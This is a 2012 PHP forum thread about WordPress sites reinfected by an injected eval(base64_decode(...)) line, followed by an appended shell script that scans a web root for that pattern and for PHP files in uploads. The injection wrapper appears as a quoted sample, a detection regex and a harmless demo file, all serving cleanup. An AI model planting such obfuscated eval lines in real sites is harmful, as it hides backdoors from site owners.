All my sites on my server are affected by some sort of eval() code, now what to do

Discussion in 'PHP' started by NewsClerks, Jul 22, 2012.

  1. #1
    Hello friends,
    All my sites in one of my hosting accounts have been affected by a random malware with eval code in it.

    All index files are affected by it.
    Tried to remove them manually but the abnormal code comes back.
    Antivirus is blocking my sites for that.

    BTW: on the same server I have another hosting account and those are not affected.

    Any suggestions to tackle this problem?

    The sites are on the WP platform.
     
    NewsClerks, Jul 22, 2012 IP
  2. rainborick

    #2
    Search on "remove malware from website" and you should find some good advice. It generally requires deleting all of the files from your server and restoring them from known, clean back-ups *after* you've ensured that your own computer is virus-free and you have changed all of the passwords to your FTP accounts. Finally, you need to be sure that you've updated all of the scripts on your site like blogs, forums, galleries, etc. Good luck!
     
    rainborick, Jul 22, 2012 IP
  3. NewsClerks

    #3
    I forgot to mention I don't have a current backup for all sites.
    I only have months-old backups.

    The code looks like this:
    <?php
    eval(base64_decode('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'));?>
     
    NewsClerks, Jul 22, 2012 IP
  4. MarPlo

    #4
    Hi
    From what I read on the net, the security problem in WP is the plugins.
    Try removing the untrusted plugins (use only ones from the official website), and change the password of the FTP account and of the Admin in WP. Also, do not use the "admin" name for the administrator.
    Hope it helps.
     
    MarPlo, Jul 22, 2012 IP
  5. NewsClerks

    #5
    All my plugins are downloaded from the official site.
    I can't detect the main script which is causing the problem.
    I worked hard to edit all files affected by this but after some time the code comes back.
    I changed the FTP, SQL and site control panel passwords; none of them is working.
     
    NewsClerks, Jul 22, 2012 IP
  6. samirj09

    #6
    In that case, there is a phpshell embedded in one of your files that is allowing the intruder to continue to gain access. Shoot me a PM on this. I'm sure I can help.
     
    samirj09, Jul 22, 2012 IP
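
Added example, not part of any post in this thread: a shell sketch for the situation described above, where the `eval(base64_decode(...))` line keeps coming back after manual cleanup. It lists files carrying that line, PHP files sitting in `wp-content/uploads`, and recently modified PHP files; the function names, the 7-day default and the demo tree are assumptions made for illustration.

```shell
#!/bin/sh
# Added example (not from the thread): triage a web root for the injection shown above.
# Run against a downloaded copy of the account's files; paths are arguments.

# ERE for the injected line quoted in the thread, tolerating extra whitespace.
INJECT_RE='eval[[:space:]]*\([[:space:]]*base64_decode[[:space:]]*\('

# PHP-like files under $1 that contain the injected pattern.
find_injected() {
    find "$1" -type f \( -name '*.php' -o -name '*.phtml' -o -name '*.inc' \) \
        -exec grep -lE "$INJECT_RE" {} + 2>/dev/null | sort
}

# PHP files inside wp-content/uploads under $1. Uploads normally hold media,
# so a script there is a strong candidate for the re-infecting shell.
find_php_in_uploads() {
    find "$1" -type f -path '*/wp-content/uploads/*' -name '*.php' | sort
}

# PHP files under $1 modified within the last $2 days (what changed since cleanup).
find_recent_php() {
    find "$1" -type f -name '*.php' -mtime "-$2" | sort
}

# Build a small constructed tree for trying the functions; prints its path.
make_demo_tree() {
    d=$(mktemp -d) || return 1
    mkdir -p "$d/wp-content/uploads/2012" "$d/wp-includes"
    # Constructed sample: the base64 string decodes to the word "constructed".
    printf '%s\n' "<?php" "eval(base64_decode('Y29uc3RydWN0ZWQ='));?>" \
        "<?php echo 'home';" > "$d/index.php"
    printf '%s\n' "<?php echo 'clean';" > "$d/wp-includes/clean.php"
    printf '%s\n' "<?php // constructed stand-in" > "$d/wp-content/uploads/2012/img.php"
    printf '%s\n' "$d"
}

# Print all three listings for the web root in $1 (look-back window $2, default 7).
scan_site() {
    echo "== injected eval(base64_decode(...)) =="; find_injected "$1"
    echo "== PHP inside uploads ==";                 find_php_in_uploads "$1"
    echo "== PHP modified in last ${2:-7} days ==";  find_recent_php "$1" "${2:-7}"
}

# Scan the directory given on the command line, if any.
if [ "$#" -gt 0 ]; then scan_site "$@"; fi
```

A file that shows up in the second or third listing without matching the first pattern deserves a manual read, since the script that re-writes the index files need not contain the injected line itself.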